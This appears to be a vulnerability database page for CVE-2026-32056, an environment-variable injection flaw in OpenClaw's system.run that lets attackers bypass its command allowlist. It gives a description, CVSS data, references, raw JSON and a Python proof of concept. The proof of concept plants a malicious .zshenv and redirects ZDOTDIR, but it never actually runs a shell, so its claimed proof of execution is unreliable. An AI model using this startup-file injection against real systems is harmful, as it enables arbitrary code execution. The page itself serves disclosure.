CVE-2026-32056

Description

OpenClaw versions prior to 2026.2.22 fail to sanitize shell startup environment variables HOME and ZDOTDIR in the system.run function, allowing attackers to bypass command allowlist protections. Remote attackers can inject malicious startup files such as .bash_profile or .zshenv to achieve arbitrary code execution before allowlist-evaluated commands are executed.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os
import subprocess

# Simulate the vulnerable system.run function in OpenClaw
def vulnerable_system_run(command):
    # The system checks the allowlist for the command
    print(f"[*] Allowlist check passed for command: {command}")
    
    # Vulnerability: The function calls a shell without sanitizing HOME/ZDOTDIR
    # Ideally, it should clean the environment or use a restricted shell
    shell = "/bin/zsh" # Assuming zsh for this example as it uses ZDOTDIR
    
    # Execute the command (in a real scenario, this spawns a subprocess)
    # The shell will load ZDOTDIR/.zshenv before running the command
    print(f"[*] Executing command via {shell}...")
    # os.system(command) # Actual execution

def main():
    print("[+] CVE-2026-32056 PoC: OpenClaw RCE via Shell Startup Env Injection")
    
    # 1. Setup malicious environment
    malicious_dir = "/tmp/evil_openclaw"
    if not os.path.exists(malicious_dir):
        os.makedirs(malicious_dir)
    
    # 2. Create malicious startup file
    payload_file = os.path.join(malicious_dir, ".zshenv")
    with open(payload_file, "w") as f:
        # This code runs BEFORE the allowlisted command
        f.write("echo 'Arbitrary Code Execution (ACE) achieved!'\n")
        f.write("touch /tmp/pwned_by_openclaw\n")
    
    print(f"[*] Created malicious payload at: {payload_file}")
    
    # 3. Exploit: Set the environment variable to point to the malicious directory
    # In a real attack, this would be done via the remote attack vector
    os.environ["ZDOTDIR"] = malicious_dir
    print(f"[*] Set ZDOTDIR to: {malicious_dir}")
    
    # 4. Trigger the vulnerability with a allowlisted command (e.g., 'ls')
    # The attacker calls system.run('ls')
    vulnerable_system_run("ls")
    
    print("[*] Check /tmp/pwned_by_openclaw for proof of execution")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32056
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32056
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32056/
[4] VulDB https://vuldb.com/cve/CVE-2026-32056
[5] https://github.com/openclaw/openclaw/commit/c2c7114ed39a547ab6276e1e933029b9530ee906
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-xgf2-vxv2-rrmg
[7] https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-shell-startup-environment-variable-injection-in-system-run

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32056", "sourceIdentifier": "[email protected]", "published": "2026-03-21T01:17:09.103", "lastModified": "2026-03-23T18:59:59.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 fail to sanitize shell startup environment variables HOME and ZDOTDIR in the system.run function, allowing attackers to bypass command allowlist protections. Remote attackers can inject malicious startup files such as .bash_profile or .zshenv to achieve arbitrary code execution before allowlist-evaluated commands are executed."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.2.22 no sanean las variables de entorno de inicio de shell HOME y ZDOTDIR en la función system.run, lo que permite a los atacantes eludir las protecciones de la lista de comandos permitidos. Los atacantes remotos pueden inyectar archivos de inicio maliciosos como .bash_profile o .zshenv para lograr ejecución de código arbitrario antes de que se ejecuten los comandos evaluados por la lista de permitidos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/c2c7114ed39a547ab6276e1e933029b9530ee906", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xgf2-vxv2-rrmg", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-shell-startup-environment-variable-injection-in-system-run", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}